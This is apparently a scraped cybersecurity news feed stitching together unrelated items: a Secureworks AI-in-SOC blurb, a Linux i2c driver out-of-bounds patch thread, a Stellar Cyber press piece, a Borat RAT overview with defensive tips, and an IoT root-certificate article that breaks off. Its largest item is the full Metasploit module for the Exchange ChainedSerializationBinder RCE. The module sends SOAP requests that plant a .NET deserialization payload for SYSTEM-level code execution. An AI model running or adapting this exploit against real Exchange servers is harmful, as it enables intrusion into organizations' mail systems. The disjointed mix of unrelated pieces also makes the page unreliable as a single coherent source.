Secureworks’ Nash Borges describes how his team has applied AI and ML to threat detection.

The marketing hyperbole is plenty loud when it comes to artificial intelligence and its subset, machine learning, in the SOC and data center, and Secureworks’ Nash Borges offers a reality check on the emerging technologies. Borges takes a deeper cut at what it takes to add AI into the technology mix in a SOC. In a practical example, he describes how his team has applied AI and ML to threat detection. Borges also addresses whether AI is the panacea it’s built up to be for security management.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Secureworks: How To Distinguish Hype From Reality With AI in SecOps

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'nokogiri'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Powershell  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Deprecated  moved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE',        'Description' => %q{          This module exploits vulnerabilities within the ChainedSerializationBinder as used in          Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and          Exchange Server 2016 CU22 all prior to Mar22SU.          Note that authentication is required to exploit these vulnerabilities.        },        'Author' => [          'pwnforsp', # Original Bug Discovery          'zcgonvh', # Of 360 noah lab, Original Bug Discovery          'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild          'Microsoft Security Response Center', # Discovery of exploitation in the wild          'peterjson', # Writeup          'testanull', # PoC Exploit          'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D          'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains          'Markus Wulftange' # CVE-2022-23277 research        ],        'References' => [          # CVE-2021-42321 references          ['CVE', '2021-42321'],          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],          ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],          ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],          ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],          ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'],          # CVE-2022-23277 references          ['CVE', '2022-23277'],          ['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'],          ['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c']        ],        'DisclosureDate' => '2021-12-09',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'HttpClientTimeout' => 5,          'WfsDelay' => 10        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169            CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.          ]        }      )    )    register_options([      Opt::RPORT(443),      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']),      OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server'])    ])  end  def post_auth?    true  end  def username    datastore['HttpUsername']  end  def password    datastore['HttpPassword']  end  def cve_2021_42321_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21      '15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22      '15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10      '15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11    ]  end  def cve_2022_23277_vuln_builds    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019    [      '15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU      '15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU      '15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU      '15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU      '15.2.922.19', # Exchange Server 2019 CU10 Nov21SU      '15.2.922.20', # Exchange Server 2019 CU10 Jan22SU      '15.2.986.14', # Exchange Server 2019 CU11 Nov21SU      '15.2.986.15'  # Exchange Server 2019 CU11 Jan22SU    ]  end  def check    # Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version    current_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)    if current_build_rex.nil?      return CheckCode::Unknown("Couldn't retrieve the target Exchange Server version!")    end    @exchange_build = current_build_rex.to_s    if cve_2021_42321_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321")    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277")    else      CheckCode::Safe("Exchange Server #{@exchange_build} does not appear to be a vulnerable version!")    end  end  def exploit    if @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it      @exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s      if @exchange_build.nil?        fail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.')      end    end    if cve_2021_42321_vuln_builds.include?(@exchange_build)      @gadget_chain = :ClaimsPrincipal    elsif cve_2022_23277_vuln_builds.include?(@exchange_build)      @gadget_chain = :DataSetTypeSpoof    else      fail_with(Failure::NotVulnerable, "Exchange Server #{@exchange_build} is not a vulnerable version!")    end    case target['Type']    when :win_cmd      execute_command(payload.encoded)    when :win_dropper      execute_cmdstager    when :psh_stager      execute_command(cmd_psh_payload(        payload.encoded,        payload.arch.first,        remove_comspec: true      ))    end  end  def execute_command(cmd, _opts = {})    # Get the user's inbox folder's ID and change key ID.    print_status("Getting the user's inbox folder's ID and ChangeKey ID...")    xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>      <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>      <m:GetFolder>        <m:FolderShape>        <t:BaseShape>AllProperties</t:BaseShape>        </m:FolderShape>        <m:FolderIds>        <t:DistinguishedFolderId Id="inbox" />        </m:FolderIds>      </m:GetFolder>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_getfolder_inbox,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.code == 401      fail_with(Failure::NoAccess, "Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\#{username}")    end    xml_getfolder = res.get_xml_document    xml_getfolder.remove_namespaces!    xml_tag = xml_getfolder.xpath('//FolderId')    if xml_tag.empty?      print_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!')      fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')    end    unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')      fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')    end    change_key_val = xml_tag.attribute('ChangeKey').value    folder_id_val = xml_tag.attribute('Id').value    print_good("ChangeKey value for Inbox folder is #{change_key_val}")    print_good("ID value for Inbox folder is #{folder_id_val}")    # Delete the user configuration object that currently on the Inbox folder.    print_status('Deleting the user configuration object associated with Inbox folder...')    xml_delete_inbox_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:DeleteUserConfiguration>          <m:UserConfigurationName Name="ExtensionMasterTable">            <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />          </m:UserConfigurationName>        </m:DeleteUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_delete_inbox_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}      print_good('Successfully deleted the user configuration object associated with the Inbox folder!')    else      print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')      print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')    end    # Now to replace the deleted user configuration object with our own user configuration object.    print_status('Creating the malicious user configuration object on the Inbox folder!')    xml_malicious_user_config = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:CreateUserConfiguration>          <m:UserConfiguration>            <t:UserConfigurationName Name="ExtensionMasterTable">              <t:FolderId Id="#{folder_id_val}" ChangeKey="#{change_key_val}" />            </t:UserConfigurationName>            <t:Dictionary>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgChkTm</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Integer64</t:Type>                  <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>              <t:DictionaryEntry>                <t:DictionaryKey>                  <t:Type>String</t:Type>                  <t:Value>OrgDO</t:Value>                </t:DictionaryKey>                <t:DictionaryValue>                  <t:Type>Boolean</t:Type>                  <t:Value>false</t:Value>                </t:DictionaryValue>              </t:DictionaryEntry>            </t:Dictionary>            <t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData>          </m:UserConfiguration>        </m:CreateUserConfiguration>      </soap:Body>    </soap:Envelope>)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),        'data' => xml_malicious_user_config,        'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.      }    )    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?    unless res&.body      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')    end    unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}      fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')    end    print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')    # Deserialize our object. If all goes well, you should now have SYSTEM :)    print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')    xml_get_client_access_token = %(<?xml version="1.0" encoding="utf-8"?>    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">      <soap:Header>        <t:RequestServerVersion Version="Exchange2013" />      </soap:Header>      <soap:Body>        <m:GetClientAccessToken>          <m:TokenRequests>            <t:TokenRequest>              <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>              <t:TokenType>CallerIdentity</t:TokenType>            </t:TokenRequest>          </m:TokenRequests>        </m:GetClientAccessToken>      </soap:Body>    </soap:Envelope>)    begin      send_request_cgi(        {          'method' => 'POST',          'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),          'data' => xml_get_client_access_token,          'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.        }      )    rescue Errno::ECONNRESET      # when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised    end  endend

Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution

An out-of-bounds memory access flaw was found in the Linux kernel Intel’s iSMT SMBus host controller driver in the way a user triggers the I2C_SMBUS_BLOCK_DATA (with the ioctl I2C_SMBUS) with malicious input data. This flaw allows a local user to crash the system.

\* **\[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access()**
**@ 2022-07-29  9:34 Zheyu Ma**
  0 siblings, 0 replies; 2+ messages in thread
From: Zheyu Ma @ 2022-07-29  9:34 UTC (permalink / raw)
  Cc: Zheyu Ma, linux-kernel

When the driver does not check the data from the user, the variable
'data->block\[0\]' may be very large to cause an out-of-bounds bug.

The following log can reveal it:

\[   33.995542\] i2c i2c-1: ioctl, cmd=0x720, arg=0x7ffcb3dc3a20
\[   33.995978\] ismt\_smbus 0000:00:05.0: I2C\_SMBUS\_BLOCK\_DATA:  WRITE
\[   33.996475\] ==================================================================
\[   33.996995\] BUG: KASAN: out-of-bounds in ismt\_access.cold+0x374/0x214b
\[   33.997473\] Read of size 18446744073709551615 at addr ffff88810efcfdb1 by task ismt\_poc/485
\[   33.999450\] Call Trace:
\[   34.001849\]  memcpy+0x20/0x60
\[   34.002077\]  ismt\_access.cold+0x374/0x214b
\[   34.003382\]  \_\_i2c\_smbus\_xfer+0x44f/0xfb0
\[   34.004007\]  i2c\_smbus\_xfer+0x10a/0x390
\[   34.004291\]  i2cdev\_ioctl\_smbus+0x2c8/0x710
\[   34.005196\]  i2cdev\_ioctl+0x5ec/0x74c

Fix this bug by checking the size of 'data->block\[0\]' first.

Fixes: 13f35ac14cd0 ("i2c: Adding support for Intel iSMT SMBus 2.0 host controller")
Signed-off-by: Zheyu Ma <zheyuma97@gmail.com>
---
 drivers/i2c/busses/i2c-ismt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
index 6078fa0c0d48..63120c41354c 100644
--- a/drivers/i2c/busses/i2c-ismt.c
+++ b/drivers/i2c/busses/i2c-ismt.c
@@ -509,6 +509,9 @@ static int ismt\_access(struct i2c\_adapter \*adap, u16 addr,
 		if (read\_write == I2C\_SMBUS\_WRITE) {
 			/\* Block Write \*/
 			dev\_dbg(dev, "I2C\_SMBUS\_BLOCK\_DATA:  WRITE\\n");
+			if (data->block\[0\] < 1 || data->block\[0\] > I2C\_SMBUS\_BLOCK\_MAX)
+				return -EINVAL;
+
 			dma\_size = data->block\[0\] + 1;
 			dma\_direction = DMA\_TO\_DEVICE;
 			desc->wr\_len\_cmd = dma\_size;
-- 
2.25.1

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

\* **\[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access()**
**@ 2022-07-29 11:02 Zheyu Ma**
  0 siblings, 0 replies; 2+ messages in thread
From: Zheyu Ma @ 2022-07-29 11:02 UTC (permalink / raw)
  To: Seth Heasley, Neil Horman, Jean Delvare, Bill Brown, Wolfram Sang
  Cc: Zheyu Ma, linux-i2c, linux-kernel

When the driver does not check the data from the user, the variable
'data->block\[0\]' may be very large to cause an out-of-bounds bug.

The following log can reveal it:

\[   33.995542\] i2c i2c-1: ioctl, cmd=0x720, arg=0x7ffcb3dc3a20
\[   33.995978\] ismt\_smbus 0000:00:05.0: I2C\_SMBUS\_BLOCK\_DATA:  WRITE
\[   33.996475\] ==================================================================
\[   33.996995\] BUG: KASAN: out-of-bounds in ismt\_access.cold+0x374/0x214b
\[   33.997473\] Read of size 18446744073709551615 at addr ffff88810efcfdb1 by task ismt\_poc/485
\[   33.999450\] Call Trace:
\[   34.001849\]  memcpy+0x20/0x60
\[   34.002077\]  ismt\_access.cold+0x374/0x214b
\[   34.003382\]  \_\_i2c\_smbus\_xfer+0x44f/0xfb0
\[   34.004007\]  i2c\_smbus\_xfer+0x10a/0x390
\[   34.004291\]  i2cdev\_ioctl\_smbus+0x2c8/0x710
\[   34.005196\]  i2cdev\_ioctl+0x5ec/0x74c

Fix this bug by checking the size of 'data->block\[0\]' first.

Fixes: 13f35ac14cd0 ("i2c: Adding support for Intel iSMT SMBus 2.0 host controller")
Signed-off-by: Zheyu Ma <zheyuma97@gmail.com>
---
 drivers/i2c/busses/i2c-ismt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
index 6078fa0c0d48..63120c41354c 100644
--- a/drivers/i2c/busses/i2c-ismt.c
+++ b/drivers/i2c/busses/i2c-ismt.c
@@ -509,6 +509,9 @@ static int ismt\_access(struct i2c\_adapter \*adap, u16 addr,
 		if (read\_write == I2C\_SMBUS\_WRITE) {
 			/\* Block Write \*/
 			dev\_dbg(dev, "I2C\_SMBUS\_BLOCK\_DATA:  WRITE\\n");
+			if (data->block\[0\] < 1 || data->block\[0\] > I2C\_SMBUS\_BLOCK\_MAX)
+				return -EINVAL;
+
 			dma\_size = data->block\[0\] + 1;
 			dma\_direction = DMA\_TO\_DEVICE;
 			desc->wr\_len\_cmd = dma\_size;
-- 
2.25.1

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

end of thread, other threads:\[~2022-07-29 11:02 UTC | newest\]

**Thread overview:** 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2022-07-29  9:34 \[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access() Zheyu Ma
2022-07-29 11:02 Zheyu Ma

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2022-2873: Fix an out-of-bounds bug in ismt_access()

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco.

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco.

Dark Reading

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco. He discusses new ransomware dangers and what users can do to protect themselves. And he describes in detail how Cisco intelligence was used to respond to a recent large-scale security event. He closes with some tips about how to better protect your organization against ransomware.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cisco: All Intelligence is Not Created Equal

By Waqas
Barmak Meftah is joining the innovator of Open XDR, Stellar Cyber in a new advisory role. What does…
This is a post from HackRead.com Read the original post: Barmak Meftah Joins Stellar Cyber, Innovator of Open XDR, as Board Advisor

****Barmak Meftah is joining the innovator of Open XDR, Stellar Cyber in a new advisory role. What does that mean for the company and the industry?****

What does the future of cybersecurity hold? Stellar Cyber might have the answer to that question, and they’re bringing reinforcements. 

On August 22nd, **Stellar Cyber** announced a new member in the form of a leadership role. Seasoned cybersecurity leader Barmak Meftah is joining the team as an advisor to the Board of Directors to encourage growth and innovation within the company further.

What can we expect from his new role based on his previous work in prominent **cybersecurity companies**? 

How has Stellar Cyber already paved the way toward more efficient security for enterprises?

Let’s find out.

**Bringing 25 Years of Experience to His New Role**

Meftah brings a stellar track record to his new leadership role. He brings 25 years of the innovative **cybersecurity market** and management experience.

His contribution has been significant within companies currently known as leaders in the cybersecurity field — including AlienVault.

In addition to his leadership positions at **AT&T Cybersecurity and AlienVault**, he previously held management positions at Hewlett-Packard, Fortify Software, Synchron, and Oracle.

Barmak Meftah

**Changming Liu**, CEO, and Co-Founder and CEO of Stellar Cyber says “His leadership experience at AT&T and AlienVault and his current role as an investor focusing on cybersecurity are invaluable to us. We are excited to inject his insights into our strategy sessions and carry out his vision of building an open and intelligent platform to democratize cybersecurity.”

**Stellar Cyber’s Open XDR Platform**

Stellar Cyber is the innovator of Open XDR. Their platform delivers comprehensive, unified security without complexity, empowering lean security teams of any skill to successfully secure their environments.

This allows organizations to reduce risks with early and precise identiﬁcation and remediation of threats while cutting costs, retaining investments in existing tools, and improving analyst productivity, delivering a 20X improvement in MTTD and an 8X improvement in MTTR.

**Continuing Where He Left Off With AlienVault**

Stellar Cyber’s specialty is also an area of cybersecurity where Meftah fits right in. In his new position, he’s going to continue the work that he had always envisioned accomplishing for AlienVault.

“At AlienVault, we delivered an excellent product to unify appropriate security components and make detection and response super-easy and accessible. In addition, we always had the vision to be an open platform and integrate with customers’ existing security stack,” said Meftah.

“Today this vision has emerged as Open XDR, and Stellar Cyber is at the forefront of this accelerating trend. I’m thrilled to help advise the company as it continues to innovate and rapidly grow market share.”

**Joe Morin**, CEO of CyFlare, adds, “We adopted AlienVault a couple of years ago because it was the NG-SIEM pioneer and market leader, and it performed well for us. We adopted Stellar Cyber because it unifies SIEM, SOAR, and NDR, and it makes our analysts more productive.”

**Pioneering Innovation and Progress**

Models such as Open XDR are steadily uniting the most popular solutions that have been existing in silos and heading toward accessible and less convoluted security.

For cyber analysts, this means that they can do more regardless of their limited manpower and resources. For businesses, this means they can secure their companies with technology that is more effective for less costly.

Stellar Cyber is already changing the face of the cybersecurity industry one improvement at a time. With Meftah’s contribution, it’s bound to head in a new, innovative, and exciting direction.

1.  **A State in the US arrested cyber security specialists it hired**
2.  **If a Cyber Security Report Falls in a Forest, Is Anyone Listening?**
3.  **Cyber Security companies dismantle Trickbot ransomware botnet**
4.  **Cybersecurity firm Mandiant Denies LockBit Ransomware’s Hacking Claim**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Barmak Meftah Joins Stellar Cyber, Innovator of Open XDR, as Board Advisor

Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen?
RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and

Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen?

RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and keyboard. Borat RAT malware goes beyond the standard features and enables threat actors to deploy ransomware and **DDoS attacks**. It also increases the number of threat actors who can launch attacks, sometimes appealing to the lowest common denominator. The added functionality of carrying out DDoS attacks makes it insidious and a risk to today's digital organizations.

Ransomware has been the most common top attack type for over three years. According to an IBM report, REvil was the most common ransomware strain, consisting of about 37% of all ransomware attacks. Borat RAT is a unique and powerful combination of RAT, spyware, and ransomware capabilities fused into a single malware.

**Borat RAT: What Makes It a Triple Threat?**

The Borat RAT provides a dashboard for malicious hackers to perform RAT malware activities and the ability to compile the malware binary for DDoS and **ransomware attacks** on the victim's machine. The RAT also includes code to launch a DDoS attack, slows down response services to legitimate users, and can even cause the site to go offline.

Remarkably, Borat RAT can deliver a ransomware payload to the victim's machine to encrypt users' files and demand a ransom. The package also includes a keylogger executable file that monitors keystrokes on victims' computers and saves them in a .txt file for exfiltration.

The other functionalities of Borat RAT malwarethat make it fun or not so fun including

*   A reverse proxy to protect the hacker
*   The ability to steal credentials from browsers or discord tokens
*   Introduce malicious code into legitimate processes

To annoy or scare its victims, the Borat RAT can also perform the following actions:

*   Switching off and on the monitor
*   Hiding/showing the desktop features such as the start button and taskbar
*   Playing unwanted audio
*   Switching the webcam light on/off

The Borat RAT malwarewill check to see if the system has a connected microphone and if so, will record audio from the computer, which will be saved in another file called "micaudio.wav." Similarly, the malware can begin recording from the camera if a webcam is discovered on the system.

**Should Businesses Develop a Solid Response Strategy?**

The volatile landscape set by the pandemic has led to every industry being a potential target for pre-packaged malware sets like Borat. All it takes is an unsuspecting employee to accidentally click a malicious link or attachment to give full access to your organization's systems. This can result in operations being halted until the ransom is paid. The halt in operations leads to huge financial and physical losses for the company.

The remote desktop function, which is included in the Borat RAT malware, can wreak havoc on your business as it allows the threat actor to delete critical information/intellectual rights, grab the version of the operating system and the model of the machine and steal potential cookies/saved login credentials. So, companies need to keep an eye out for the threat and prepare themselves against such attacks.

**Recommendations for Enhanced Security**

Let's look at the recommendations listed below to secure your networks against the risk of cyberattacks:

*   Examine the use of remote administration tools for applications and systems on the industrial network. Remove any remote administration tools that aren't necessary for the industrial process
*   Establish strong password management and enable multi-factor authentication
*   Utilize reputed antivirus software and internet security packages
*   Include a response strategy to contain the threat immediately
*   Utilize flash storage solutions and set relevant measures to back up data. This will help promote operational continuity and lower infrastructural costs
*   Avoid keeping important files in common locations such as Desktop and My Documents
*   Employ an email software security solution that can classify and filter out malicious emails. Employees can also have regular training sessions to gain awareness of the upcoming threats
*   Refine and optimize your vulnerability management system. This will help your organization prioritize the vulnerabilities of most concern

Organizations need to empower their employees to understand the current threat landscape better. Investing in the right technologies and creating robust verification measures can ensure that the right individuals can access the right data. Resolving incidents quickly and efficiently in today's fast-paced digital world is imperative.

Organizations that strategically plan for the next threat will have a positive customer experience in the long run. Solutions like **AppTrana** help you focus on expanding your business operations without worrying about the safety of your critical assets.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Meet Borat RAT, a New Unique Triple Threat

What happens when businesses' smart devices break? CSOs have things to fix beyond security holes.

So many everyday items in the developed world are now connected to the Internet, often inexplicably. It adds another layer of potential technology failure that for personal appliances can be something of an amusing annoyance: blinds that won't open, microwaves that don't adjust for time changes, refrigerators that need firmware updates.

But in the enterprise, when Internet of Things devices fail, it's no Twitter-thread joke. Factory assembly lines grind to a halt. Heart-rate monitors in hospitals switch offline. Elementary school smart boards go dark.

Smart device failures are an increasing risk in the enterprise world, and not just because of the oft-discussed security worries. It's because some of these devices' root certificates — necessary for them to connect to the Internet securely — are expiring.

"Devices need to know what to trust, so the root certificate is built into the device as an authentication tool," explains Scott Helme, a security researcher who has written extensively about the root certificate expiration issue. "Once the device is in the wild it tries to call 'home' — an API or manufacturer's server — and it checks against this root certificate to say, 'Yes, I'm connecting to this correct secure thing.' Essentially \[a root certificate is\] a trust anchor, a frame of reference for the device to know what it's speaking to."

In practice this authentication is like a web or a chain. Certificate authorities (CAs) issue all kinds of digital certificates, and the entities "talk" to each other, sometimes with multiple levels. But the first and most core link of this chain is always the root certificate. Without it, none of the levels above could make the connections possible. So if a root certificate stops working, the device can't authenticate the connection and won't link to the Internet.

Here's the problem: The concept of the encrypted Web developed around 2000 — and root certificates tend to be valid for about 20 to 25 years. In 2022, then, we're smack in the middle of that expiration period.

The CAs have issued plenty of new root certificates in the last two-plus decades, of course, well ahead of expirations. That works well in the personal device world, where most people frequently upgrade to new phones and click to update their laptops, so they would have these newer certs. But in the enterprise, it can be far more challenging or even impossible to update a device — and in sectors like manufacturing, machines may indeed still be on the factory floor 20 to 25 years later.

Without an Internet connection, "these devices aren't worth a thing," says Kevin Bocek, vice president of security strategy and threat intelligence at Venafi, provider of machine identity management services. "They essentially become bricks \[when their root certs expire\]: They can't trust the cloud anymore, can't take commands, can't send data, can't take software updates. That's a real risk, particularly if you're a manufacturer or an operator of some kind."

**A Warning Shot**

The risk isn't theoretical. On September 30, a root certificate issued by the massive CA Let's Encrypt expired — and several services across the Internet broke. The expiration wasn't a surprise, as Let's Encrypt had long been warning its customers to update to a new cert.

